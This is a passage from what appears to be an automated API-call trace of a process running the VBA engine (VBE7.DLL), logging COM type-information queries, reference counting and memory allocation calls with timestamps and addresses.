GUID=0x7fee51d4e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x1dc498 | out: pVarVal=0x1dc498*(varType=0x0, wReserved1=0xa30, wReserved2=0x0, wReserved3=0x0, varVal1=0xa166880, varVal2=0x1dd1a8)) returned 0x0 [0157.578] IUnknown:Release (This=0xa121698) returned 0x3 [0157.578] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc490 | out: ppvObject=0x1dc490*=0xa121698) returned 0x0 [0157.578] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612785, invkind=1, pFuncIndex=0x1dc488 | out: pFuncIndex=0x1dc488*=0x31) returned 0x0 [0157.578] ITypeInfo2:GetParamCustData (in: This=0xa121698, indexFunc=0x31, indexParam=0x4, GUID=0x7fee51d4e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x1dc498 | out: pVarVal=0x1dc498*(varType=0x0, wReserved1=0xa30, wReserved2=0x0, wReserved3=0x0, varVal1=0xa166880, varVal2=0x1dd1a8)) returned 0x0 [0157.578] IUnknown:Release (This=0xa121698) returned 0x3 [0157.578] IUnknown:AddRef (This=0xa121488) returned 0x2 [0157.579] IUnknown:Release (This=0xa121488) returned 0x1 [0157.579] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc490 | out: ppvObject=0x1dc490*=0xa121698) returned 0x0 [0157.579] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612785, invkind=1, pFuncIndex=0x1dc488 | out: pFuncIndex=0x1dc488*=0x31) returned 0x0 [0157.579] ITypeInfo2:GetParamCustData (in: This=0xa121698, indexFunc=0x31, indexParam=0x5, GUID=0x7fee51d4e80*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x1dc498 | out: pVarVal=0x1dc498*(varType=0x3, wReserved1=0xa30, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x1dd1a8)) returned 0x0 [0157.579] IUnknown:Release (This=0xa121698) returned 0x3 [0157.580] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc550 | out: ppvObject=0x1dc550*=0xa121698) returned 0x0 [0157.580] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612785, invkind=1, pFuncIndex=0x1dc590 | out: pFuncIndex=0x1dc590*=0x31) returned 0x0 [0157.580] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0x31, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc5a8 | out: pVarVal=0x1dc5a8*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x31, varVal2=0x100e66)) returned 0x0 [0157.580] IUnknown:Release (This=0xa121698) returned 0x3 [0157.580] IUnknown:AddRef (This=0xa121488) returned 0x2 [0157.580] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc448 | out: ppvObject=0x1dc448*=0x0) returned 0x80004002 [0157.580] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc508 | out: ppvObject=0x1dc508*=0x0) returned 0x80004002 [0157.580] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc3e0 | out: ppvObject=0x1dc3e0*=0x0) returned 0x80004002 [0157.580] IUnknown:Release (This=0xa121488) returned 0x1 [0157.580] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.580] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0157.580] IUnknown:Release (This=0xa121698) returned 0x3 [0157.580] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc818 | out: ppvObject=0x1dc818*=0x0) returned 0x80004002 [0157.580] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.580] IUnknown:Release (This=0xa121698) returned 0x3 [0157.580] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.581] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.581] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.581] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.581] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.581] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.581] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.581] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.581] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.581] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.581] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.581] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.581] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.581] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.581] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.581] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.581] GetCurrentProcess () returned 0xffffffffffffffff [0157.582] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x73) returned 1 [0157.582] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.582] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c563b0 [0157.582] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c900f0, cb=0x100) returned 0xa1cacd0 [0157.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f1b6, cbMultiByte=2, lpWideCharStr=0x6792494, cchWideChar=6 | out: lpWideCharStr="[]") returned 2 [0157.582] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.582] IUnknown:Release (This=0xa121698) returned 0x3 [0157.582] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.582] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.582] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.582] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.582] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.582] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.582] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.582] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.582] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f1c6, cbMultiByte=3, lpWideCharStr=0x6792b3e, cchWideChar=8 | out: lpWideCharStr="{^}") returned 3 [0157.582] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa30caf0, cb=0x800) returned 0xa2dded0 [0157.582] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.582] IUnknown:Release (This=0xa121698) returned 0x3 [0157.582] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.582] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.583] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.583] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.583] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.583] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.583] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.583] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.583] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f1d8, cbMultiByte=3, lpWideCharStr=0x67931ea, cchWideChar=8 | out: lpWideCharStr="[*]") returned 3 [0157.583] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.583] IUnknown:Release (This=0xa121698) returned 0x3 [0157.583] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.583] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.583] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.583] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.583] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.583] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.583] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.583] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.583] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.583] IUnknown:AddRef (This=0xa02b108) returned 0x4 [0157.583] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc728 | out: ppvObject=0x1dc728*=0x0) returned 0x80004002 [0157.583] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc708, pDummy=0x10 | out: ppTypeAttr=0x1dc708, pDummy=0x10) returned 0x0 [0157.583] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.583] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.583] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.583] IUnknown:Release (This=0xa02b108) returned 0x3 [0157.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a006a, cbMultiByte=12, lpWideCharStr=0x1dc6f0, cchWideChar=13 | out: lpWideCharStr="Application") returned 12 [0157.584] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc6b0, pDummy=0x1 | out: ppTypeAttr=0x1dc6b0, pDummy=0x1) returned 0x0 [0157.584] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.584] ITypeInfo:GetRefTypeInfo (in: This=0xa02b108, hreftype=0x1fa80, ppTInfo=0x1dbf68 | out: ppTInfo=0x1dbf68*=0xa031408) returned 0x0 [0157.584] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc138 | out: ppvObject=0x1dc138*=0x0) returned 0x80004002 [0157.584] ITypeInfo:RemoteGetTypeAttr (in: This=0xa031408, ppTypeAttr=0x1dbfb8, pDummy=0x10 | out: ppTypeAttr=0x1dbfb8, pDummy=0x10) returned 0x0 [0157.584] ITypeInfo:LocalReleaseTypeAttr (This=0xa031408) returned 0x0 [0157.584] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dbcc0 | out: ppvObject=0x1dbcc0*=0x0) returned 0x80004002 [0157.584] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dbcb0 | out: ppvObject=0x1dbcb0*=0x0) returned 0x80004002 [0157.584] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dbcb8 | out: ppvObject=0x1dbcb8*=0x0) returned 0x80004002 [0157.584] ITypeInfo:RemoteGetTypeAttr (in: This=0xa031408, ppTypeAttr=0x1dbce8, pDummy=0x10 | out: ppTypeAttr=0x1dbce8, pDummy=0x10) returned 0x0 [0157.584] ITypeInfo:LocalReleaseTypeAttr (This=0xa031408) returned 0x0 [0157.584] IUnknown:AddRef (This=0xa031408) returned 0x2 [0157.584] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dbe60 | out: ppvObject=0x1dbe60*=0x0) returned 0x80004002 [0157.584] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dbe58 | out: ppvObject=0x1dbe58*=0x0) returned 0x80004002 [0157.584] IUnknown:Release (This=0xa031408) returned 0x1 [0157.584] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa30c6e0, cb=0x800) returned 0xa2de6e0 [0157.584] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc460, pDummy=0x0 | out: ppTypeAttr=0x1dc460, pDummy=0x0) returned 0x0 [0157.584] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.584] IUnknown:AddRef (This=0xa031408) returned 0x2 [0157.584] IUnknown:Release (This=0xa031408) returned 0x1 [0157.584] IUnknown:AddRef (This=0xa031408) returned 0x2 [0157.584] IUnknown:Release (This=0xa031408) returned 0x1 [0157.584] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc510 | out: ppvObject=0x1dc510*=0xa02b108) returned 0x0 [0157.584] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa02b108, memid=148, invkind=2, pFuncIndex=0x1dc550 | out: pFuncIndex=0x1dc550*=0x0) returned 0x0 [0157.584] ITypeInfo2:GetFuncCustData (in: This=0xa02b108, index=0x0, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc568 | out: pVarVal=0x1dc568*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1dc610, varVal2=0xa026218)) returned 0x0 [0157.585] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.585] IUnknown:AddRef (This=0xa031408) returned 0x2 [0157.585] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc4c8 | out: ppvObject=0x1dc4c8*=0x0) returned 0x80004002 [0157.585] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc3a0 | out: ppvObject=0x1dc3a0*=0x0) returned 0x80004002 [0157.585] IUnknown:Release (This=0xa031408) returned 0x1 [0157.585] IUnknown:AddRef (This=0xa031408) returned 0x2 [0157.585] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc4c8 | out: ppvObject=0x1dc4c8*=0x0) returned 0x80004002 [0157.585] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51d2aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc3a0 | out: ppvObject=0x1dc3a0*=0x0) returned 0x80004002 [0157.585] IUnknown:Release (This=0xa031408) returned 0x1 [0157.585] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.585] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b108) returned 0x0 [0157.585] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.585] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0157.585] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.585] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.585] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.585] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.585] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.585] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dcb28, pDummy=0x0 | out: ppTypeAttr=0x1dcb28, pDummy=0x0) returned 0x0 [0157.585] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.585] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.585] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.585] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.585] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.585] GetCurrentProcess () returned 0xffffffffffffffff [0157.585] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4c) returned 1 [0157.585] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.585] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc0c0, pDummy=0x0 | out: ppTypeAttr=0x1dc0c0, pDummy=0x0) returned 0x0 [0157.585] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.585] IUnknown:AddRef (This=0xa031408) returned 0x2 [0157.585] 